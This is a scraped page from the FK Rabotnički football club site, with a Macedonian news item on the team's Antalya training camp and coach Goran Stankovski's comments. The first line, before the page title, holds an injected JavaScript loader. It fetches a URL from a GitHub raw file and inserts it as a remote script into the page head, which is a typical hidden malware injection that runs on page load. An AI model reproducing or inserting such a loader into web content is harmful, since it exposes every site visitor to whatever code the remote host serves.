;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Работнички ги одработи подготовките во Анталија и се врати во Скопје
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Работнички ги одработи подготовките во Анталија и се врати во Скопје

Работнички ги заокружи десетдневните подготовки во турската база Анталија и попладнево се врати во Скопје. Глазурата на формата пред почетокот на пролетниот дел ќе се реализира во сопствената база, а „генералката“ ќе биде на 7 февруари против Беласица.

Тренерот Горан Станковски е задоволен од реализираните активности на подготовките во Анталија.

„Мислам дека одработивме одлични подготовки. Задоволен сум секако од условите што ги имавме во Анталија, како и од нашата реализирана програма. Новите фудбалери се вклопија добро во нашиот тим, ја прифатија филозофијата на играта, и сега останува да финишираме со подготовките во Скопје, пред почетокот на пролетниот дел од првенството. Ќе имаме генерална проверка против Беласица, најважно е дека здравствениот билтен е одличен и сега ќе се фокусираме на сите детали за да бидеме максимално подготвени за вториот дел од сезоната“, вели шефот на стручниот штаб, Горан Станковски.

По денешното пристигнување во Скопје, тимот на Работнички продолжува со тренинзите в сабота попладне.